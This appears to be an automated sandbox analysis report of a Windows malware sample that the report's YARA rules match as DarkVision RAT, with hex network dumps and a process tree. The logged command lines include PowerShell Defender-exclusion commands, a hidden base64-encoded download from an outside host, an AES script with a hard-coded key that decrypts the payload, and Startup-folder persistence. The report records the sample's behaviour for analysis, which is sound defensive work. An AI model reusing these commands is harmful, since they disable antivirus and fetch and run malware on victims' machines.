                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 00 c7 44 24 20 00 00 00 00 4c 8d 4d c0 50 59 90 48 89 da 49 89 c0 e8 b2 0a 02 00 09 c0 0f 84 1c 01 00 00 48 8b 75 c0 e9 8d 00 00 00 49 89 dd 44 89 e8 83 e0 03 83 f8 01 75 39 49 8d 5d ff 4d 8b 75 ff 49 8b 7d 07 48 8b 07 48 85 c0 74 05 4c 89 f1 ff d0 48 83 7f 08 00 74 0c 48 8b 57 10 4c 89 f1 e8 2b d8 fe ff ba 08 00 00 00 53 90 59 e8 1e d8 fe ff 49 c7 04 24 00 00 00 00 48 81 c4 c8 04 00 00 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 5d c3 e8 89 0a 02 00 49 c7 04 24 00 00 00 00 48 89 d9 48 81 c4 c8 04 00 00 5b 5f 5e 41 5c 41 5d 41 5e 41 5f 5d e9 e6 09 02 00 31 f6 48 c7 44 24 28 00 00 00 00 c7 44 24 20 00 00 00 00 56 59 90 31 d2 41 b8 02 00 00 00 45 31 c9 e8 d8 09 02 00 48 09 c0 74 4b 90 50 5f 49 c1 e7 20 4d 09 f7 4c 89 7c 24 20 90 50 59 ba 04 00 00 00 45 31 c0 45
                                                                                                          Data Ascii: D$ LMPYHIHuIDu9I]MuI}HHtLHtHWL+SYI$H[_^A\A]A^A_]I$HH[_^A\A]A^A_]1HD$(D$ VY1AE1HtKP_I ML|$ PYE1E
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 00 ba 08 01 00 00 e8 c6 9b fe ff 0f 0b eb 36 eb 34 48 89 c7 48 8d 8d c0 08 00 00 e8 f1 5d 00 00 e9 69 01 00 00 e8 17 c4 fe ff eb 19 48 89 c7 48 8d 8d d8 01 00 00 e8 36 95 00 00 e9 44 03 00 00 e8 fc c3 fe ff 48 89 c7 eb 24 48 89 c7 48 89 f1 e8 1c 95 00 00 e9 2a 03 00 00 e8 e2 c3 fe ff 48 89 c7 48 8d 8d 28 0b 00 00 e8 43 7b 00 00 48 8d 8d 10 05 00 00 e8 57 83 00 00 e9 0f 01 00 00 48 89 c7 e9 60 02 00 00 48 89 c7 48 8d 8d 08 0b 00 00 e8 7b 85 00 00 48 8b 8d c0 0c 00 00 48 8b 95 98 0c 00 00 e8 18 88 00 00 31 db eb 16 e8 8f c3 fe ff 48 89 c7 48 8d 8d e0 0b 00 00 e8 90 84 00 00 b3 01 45 31 ff 48 83 bd c8 0c 00 00 00 75 16 eb 25 e8 6a c3 fe ff 48 89 c7 b3 01 48 89 b5 70 0c 00 00 41 b7 01 ba 08 00 00 00 48 8b 8d 70 0c 00 00 e8 9a 97 fe ff f0 49 ff 4d 00 75
                                                                                                          Data Ascii: 64HH]iHH6DH$HH*HH(C{HWH`HH{HH1HHE1Hu%jHHpAHpIMu
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 00 00 49 8d 50 01 48 89 16 4c 89 5e 08 45 0f b6 00 83 f9 3f 75 bd 41 83 f8 7f 74 b7 45 09 c0 74 b2 b0 07 e9 a9 09 00 00 4d 09 db 48 8b 4d 00 0f 84 7c 02 00 00 31 ff 66 66 66 2e 0f 1f 84 00 00 00 00 00 80 3c 3a 00 0f 84 03 0a 00 00 48 ff c7 49 39 fb 75 ee e9 57 02 00 00 41 bb 09 00 00 00 31 c9 b0 01 e9 25 06 00 00 49 83 fb 02 0f 82 3e 02 00 00 49 83 c3 fe 48 8d 42 02 4c 8b 45 00 49 89 00 4d 89 58 08 0f b7 3a e9 17 02 00 00 4d 09 db 0f 84 1a 02 00 00 49 ff cb 48 8d 42 01 4c 8b 45 00 49 89 00 4d 89 58 08 0f b6 3a e9 f4 01 00 00 4d 09 db 0f 84 87 06 00 00 4e 8d 04 1a 49 ff cb 48 ff c2 31 c0 29 c9 0f b6 5a ff 83 f9 3f 75 09 80 fb 02 0f 83 ea 08 00 00 4d 89 d6 44 0f b6 d3 44 89 d6 83 e6 7f 48 d3 e6 48 09 f0 45 84 d2 0f 89 1c 0a 00 00 83 c1 07 48 ff c2 49 83 c3
                                                                                                          Data Ascii: IPHL^E?uAtEtMHM|1fff.<:HI9uWA1%I>IHBLEIMX:MIHBLEIMX:MNIH1)Z?uMDDHHEHI
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 03 00 00 90 57 59 e8 e8 a7 00 00 48 83 f8 01 0f 94 c0 48 81 fa 00 01 00 00 0f 92 c1 84 c8 74 53 88 56 08 b8 28 00 00 00 e9 73 03 00 00 90 57 59 e8 be a7 00 00 48 83 f8 01 0f 94 c0 48 81 fa 00 01 00 00 0f 92 c1 84 c8 74 29 88 56 08 b8 21 00 00 00 e9 49 03 00 00 90 57 59 e8 94 a7 00 00 48 83 f8 01 75 0e 48 89 56 08 b8 2d 00 00 00 e9 2d 03 00 00 48 8b 07 48 8d 0d 0a 86 01 00 48 63 04 81 48 01 c8 ff e0 48 8b 47 08 48 89 46 08 29 c0 e9 0b 03 00 00 48 8b 47 08 48 89 46 08 b8 16 00 00 00 e9 f9 02 00 00 48 8b 47 08 48 89 46 08 b8 17 00 00 00 e9 e7 02 00 00 48 8b 47 08 48 89 46 08 b8 0b 00 00 00 e9 d5 02 00 00 48 8b 47 08 e9 ee 02 00 00 48 8b 47 08 48 89 46 08 b8 15 00 00 00 e9 ba 02 00 00 48 8b 47 08 48 89 46 08 b8 10 00 00 00 e9 a8 02 00 00 48 8b 47 08 48 89 46
                                                                                                          Data Ascii: WYHHtSV(sWYHHt)V!IWYHuHV--HHHcHHGHF)HGHFHGHFHGHFHGHGHFHGHFHGHF
                                                                                                          2024-12-09 06:37:31 UTC16384INData Raw: 8b 01 49 83 f8 ff 0f 84 91 00 00 00 51 90 5e 49 8d 40 01 4b 8d 0c 00 48 39 c1 48 0f 47 c1 48 83 f8 05 bf 04 00 00 00 48 0f 43 f8 29 c9 ba 18 00 00 00 57 90 58 48 f7 e2 70 77 49 b9 f8 ff ff ff ff ff ff 7f 4c 39 c8 77 63 4d 85 c0 74 1b 48 8b 4e 08 49 c1 e0 03 4b 8d 14 40 48 89 4d d0 48 89 55 e0 b9 08 00 00 00 eb 02 29 c9 48 89 4d d8 48 8d 4d e8 4c 8d 4d d0 ba 08 00 00 00 49 89 c0 e8 df f7 fe ff 83 7d e8 01 74 1a 48 8b 45 f0 48 89 46 08 48 89 3e 48 83 c4 50 5f 5e 5d c3 29 c9 e8 cf da fd ff 48 8b 4d f0 48 8b 55 f8 e8 c2 da fd ff e8 bd da fd ff cc 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 56 57 48 83 ec 50 48 8d 6c 24 50 4c 8b 01 49 83 f8 ff 0f 84 91 00 00 00 51 5e 90 49 8d 40 01 4b 8d 0c 00 48 39 c1 48 0f 47 c1 48 83 f8 05 bf 04 00 00 00 48 0f 43 f8 31 c9 ba 48
                                                                                                          Data Ascii: IQ^I@KH9HGHHC)WXHpwIL9wcMtHNIK@HMHU)HMHMLMI}tHEHFH>HP_^])HMHUfff.UVWHPHl$PLIQ^I@KH9HGHHC1H


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 154.216.20.243 | 443 | 7784 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-09 06:37:30 UTC | 171 | OUT | GET /64.EXE HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Host: woo097878781.win
2024-12-09 06:37:31 UTC | 274 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 Dec 2024 06:37:30 GMT
Content-Type: application/x-msdos-program
Content-Length: 1021952
Last-Modified: Mon, 18 Nov 2024 12:28:55 GMT
Connection: close
ETag: "673b3307-f9800"
X-Powered-By: PleskLin
Accept-Ranges: bytes



                                                                                                          Target ID:0
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase:0x140000000
                                                                                                          File size:124'416 bytes
                                                                                                          MD5 hash:A3D68745E8919E2A48D8FA0738DA124E
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:1
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.bat C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase:0x7ff614bf0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:2
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:net session
                                                                                                          Imagebase:0x7ff7f29f0000
                                                                                                          File size:59'904 bytes
                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:4
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\net1 session
                                                                                                          Imagebase:0x7ff64eb30000
                                                                                                          File size:183'808 bytes
                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:01:36:57
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:7
                                                                                                          Start time:01:37:01
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:8
                                                                                                          Start time:01:37:13
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:timeout /t 10 /nobreak
                                                                                                          Imagebase:0x7ff643710000
                                                                                                          File size:32'768 bytes
                                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:moderate
                                                                                                          Has exited:true

                                                                                                          Target ID:12
                                                                                                          Start time:01:37:23
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:13
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\downloaded_file.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\downloaded_file.exe"
                                                                                                          Imagebase:0x300000
                                                                                                          File size:515'584 bytes
                                                                                                          MD5 hash:D60C9E070239F8C240AAA6D8832E11EF
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security
                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 83%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:14
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                                                                                                          Imagebase:0x7ff614bf0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:15
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:16
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\explorer.exe"
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Has exited:false

                                                                                                          Target ID:17
                                                                                                          Start time:01:37:25
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
                                                                                                          Imagebase:0x7ff788560000
                                                                                                          File size:452'608 bytes
                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:18
                                                                                                          Start time:01:37:32
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\EXPLORER.EXE {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:19
                                                                                                          Start time:01:37:34
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""
                                                                                                          Imagebase:0x7ff66ccc0000
                                                                                                          File size:2'887'168 bytes
                                                                                                          MD5 hash:56EC5472231866630749CCF6977C4FBD
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2047760821.0000016DE66D1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2048053802.0000016DE6950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.2047498175.0000016DE6452000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Has exited:true

                                                                                                          Target ID:20
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:21
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:22
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:23
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:24
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:25
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\powercfg.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                          Imagebase:0x7ff70c000000
                                                                                                          File size:96'256 bytes
                                                                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:26
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:27
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:28
                                                                                                          Start time:01:37:35
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:explorer.exe
                                                                                                          Imagebase:0x7ff72b770000
                                                                                                          File size:5'141'208 bytes
                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:29
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat" "
                                                                                                          Imagebase:0x7ff614bf0000
                                                                                                          File size:289'792 bytes
                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:30
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:31
                                                                                                          Start time:01:37:36
                                                                                                          Start date:09/12/2024
                                                                                                          Path:C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe
